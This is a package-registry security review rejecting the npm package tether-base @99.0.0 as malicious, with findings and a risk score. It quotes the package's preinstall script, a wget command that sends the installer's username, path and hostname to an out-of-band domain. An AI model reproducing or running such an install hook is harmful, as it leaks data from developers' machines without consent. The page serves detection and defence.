All tether-base versions

tether-base @99.0.0

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
71
Risk Score
MIT
License
Yes
Install Scripts
0
Dependencies
0
Dev Dependencies
.3 KB
Package Size
Published

Test package for dependency confusion detection

Maintainers

nothingishere

SAST Findings (3)

CRITICAL MAL-2026-3033: Malicious code in tether-base (npm) osv

--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (88b507927542b8b7858e8bcd5d8890f261e4db310240cb16df8c3da133df5be4) The OpenSSF Package Analysis project identified 'tether-base' @ 99.0.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.

HIGH Package has 'preinstall' script install-scripts

Script: wget --quiet "http://cuwihexxxizbqmurenibmncf9zuih6fby.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

Review Summary

Risk score: 71. Findings: 1 critical (+40), 1 high (+25), 2 low (+6).

Published to npm: